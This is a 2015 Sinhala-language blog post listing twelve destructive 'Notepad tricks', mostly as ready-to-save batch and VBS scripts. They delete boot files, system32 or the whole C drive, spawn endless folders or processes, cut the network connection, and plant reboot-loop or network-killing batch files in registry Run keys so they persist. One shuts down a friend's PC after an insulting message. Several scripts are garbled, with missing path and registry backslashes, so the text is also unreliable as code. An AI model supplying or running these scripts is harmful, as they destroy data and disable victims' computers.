Monday, February 9, 2015

Notepad එකෙන් කළ හැකි භයානක වැඩ 12ක්




මේවා සැබැවින්ම භයානක වන බැවින් ප්‍රවේසමින් අත්හදා බලන්න.ඔබට මේ සඳහා Virtual PC
එකක් භාවිතා කළ හැක.

*මිනිත්තුවක් තුළදී Folder 3000කටත් වඩා සෑදීම.*


Notepad එක Open කරලා පහත Code එක ගහන්න.
@echo off
:top
md %random%
දැන් ඒක 1000.bat හෝ ඔබ කැමති නමකින් Save කරන්න. Save කරපු තැන තියෙන මේ File එක
Open කරොත් එතන Folder වලින් පිරෙනවා.
Code එක වැඩ නොකරන අය @echo off
:top
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
ඔහොම md %random% වැඩි වතාවක් යොදා බලන්න.

*පරිගණකයක් සදහටම ක්‍රියා විරහිත කිරීම. *


code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

shutdown-forever.bat ලෙස මෙය Save කරන්න.මෙමඟින් ඔබේ පරිගණකය ක්‍රියා විරහිත කර්න
අතර එය නැවත ක්‍රියාත්මක කිරීමට අවශ්‍ය File Delete කරයි.

*ඔබේ පරිගණක පද්ධතියම Delete කරන්න.*


del *.*

මෙයත් කැමති .bat File එකක් විදියට Save කරන්න. ඔයාගෙ Hard Disk වල තියෙන සේරම
File සුද්ද කරලා දෙයි.

*RAM එක ඉවරයක් කරන්න*


Notepad එකේ පහල Code එක ගහන්න.

:A
start http://sadeepa01.blogspot.com/
goto A

.bat File එකක් විදියට Save කරන්න.

*Internet Connection එක නැති කරලා දාන්න.*


@Echo off
Ipconfig /release

මෙය නැවත සැකසීමට

IPconfig /renew

*System 32 Folder එක නැති කරන්න*


del c:\WINDOWS\system32\*.*/q

මේක නැති උනොත් Windows වැඩ කරන්නෙ නෑ.

*යාලුවට Warning එකක් දීලම එයාගෙ PC එක Shut Down කරන්න.*


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

*නවතින්නෙ නැතුව Enter කරන්න.*


Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Anything.VBS ලෙස Save කරන්න.

*පරිගණකය ඉවරයක් කරන්න*


Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Anything.VBS ලෙස Save කරන්න.

*C Drive එක නැති කරන්න*


@Echo off
Del C: *.* |y

*පරිගණකය On කළ විගස Off කරවන්න.*


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t
reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

මෙය 2.bat ලෙස Save කරන්න.

*සදාකාලිකවම Internet නැති කරන්න.*


echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

මෙය 2.bat ලෙස Save කරන්න.

මෙහි ඇති බොහොමයක් code අත්හදා බැලීමට යාම එතරම් සුදුසු නොවන බැවින් ඔබට යම් ගැටලුවක්
සිදුවුවහොත් එයට වගකීමක් මම භරගන්නේ නැත.

No comments:

Post a Comment